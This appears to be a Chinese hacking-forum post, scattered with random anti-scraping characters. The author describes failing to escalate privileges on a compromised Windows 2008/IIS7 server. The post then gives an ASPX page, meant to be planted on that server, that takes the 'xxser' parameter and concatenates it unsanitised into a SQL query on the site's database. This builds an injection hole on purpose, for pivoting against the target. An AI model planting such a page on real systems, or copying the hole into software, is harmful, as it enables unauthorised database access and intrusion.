昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
4 v, _' ?+ m: c0 T" f: n其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。% t; S6 w# ~% r) M- a
代码量不多,自己写个拉倒了。烦死了。0 O2 l9 K' l' w; L! O+ z
9 a: M B$ Q, b1 b) d( L2 P: q
# ~2 L/ p( v, X0 p<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
, [. }* U( t) v# S6 U0 p<html xmlns="http://www.w3.org/1999/xhtml">
" z4 t7 w, E; K6 ] l: i F* g<head runat="server"> g" `# B' W" x) @" t! w
<title>暗影aspx构造注射专用页面</title>: G: l/ E3 O6 g/ K9 l/ z
</head>
' s6 K, K) z( T5 J. q3 X+ x<body>
$ u# R8 [# s; O9 s" ], q7 x <form id="form1" runat="server">
* S1 P/ z( ~! j <div>) R5 X$ s# E0 ~# ?2 t C' Y! t
<script language="c#" runat="server">; {* L& n( y' \- Z4 K; K" T1 b
/ v0 y8 S. E/ y( E* H& D7 h void page_init(object sender, EventArgs e)( x! x5 z7 U* A. K5 k' P
{
$ H5 ]! P6 F# x% h* Z9 _& d ) u6 Y- [" `4 p. o( {. M
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();# J0 A( c8 I" g2 b! S5 {+ ?
( w5 n3 o: K0 _& \7 Y# d7 Y
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();( f! h' ^$ q# p) _% F
conn.Open();/ a7 i, r$ z& D' N
# S* y( y; W9 R: Y string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
: ^" p9 @. G# g: S
8 K, g2 h6 C- i System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);5 `+ M% r; M7 m. g
int x = command.ExecuteNonQuery();
' a( M- A: F9 j2 |& l& a9 L- N, H! K Response.Write(i+"\n");
8 b. F3 }- v& ~. ~ Response.Write(x);
7 x6 Y2 ^9 C; l5 m& p1 F conn.Close();
6 z; K7 W/ |, H9 I" K }! t* l; `9 e3 p0 k1 \4 R9 ` D
) ~$ c: A5 Q* X% U# k1 \! u
</script>
& T6 L: M$ K+ ]0 X+ l" y </div>
" A( o, s% P+ S5 a% w$ v </form>& F$ T; ~) T9 g% J
</body>9 n8 _4 X9 V7 P1 P( b8 J8 `& [& P& Y" R
</html>
: f. J+ Z3 o) P; n8 Q2 L |